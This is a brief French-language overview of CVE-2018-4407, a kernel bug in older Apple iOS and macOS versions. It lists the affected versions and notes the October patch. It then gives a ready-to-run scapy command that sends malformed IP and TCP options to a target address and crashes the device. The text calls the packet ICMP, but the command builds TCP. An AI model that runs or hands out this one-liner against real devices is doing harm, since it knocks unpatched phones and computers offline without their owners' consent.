
Aperçu et implémentation de CVE-2018-4407
Le principe est de rendre les autres champs du paquet "icmp" illégaux. Lors de l'analyse par le noyau macOS ou iPhone, la vérification de la taille n'est pas implémentée, ce qui provoque un crash.
Apple iOS 11 et versions antérieures : tous les appareils
Apple macOS High Sierra (version maximale affectée 10.13.6) : tous les appareils
Apple macOS Sierra (version maximale affectée 10.12.6) : tous les appareils
Apple OS X El Capitan et versions antérieures : tous les appareils
Apple a complètement corrigé cette vulnérabilité dans le pack de mise à jour "iOS 12.1" publié le 30 octobre.
pip install scapy
sudo scapy send(IP(dst="Target IP",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))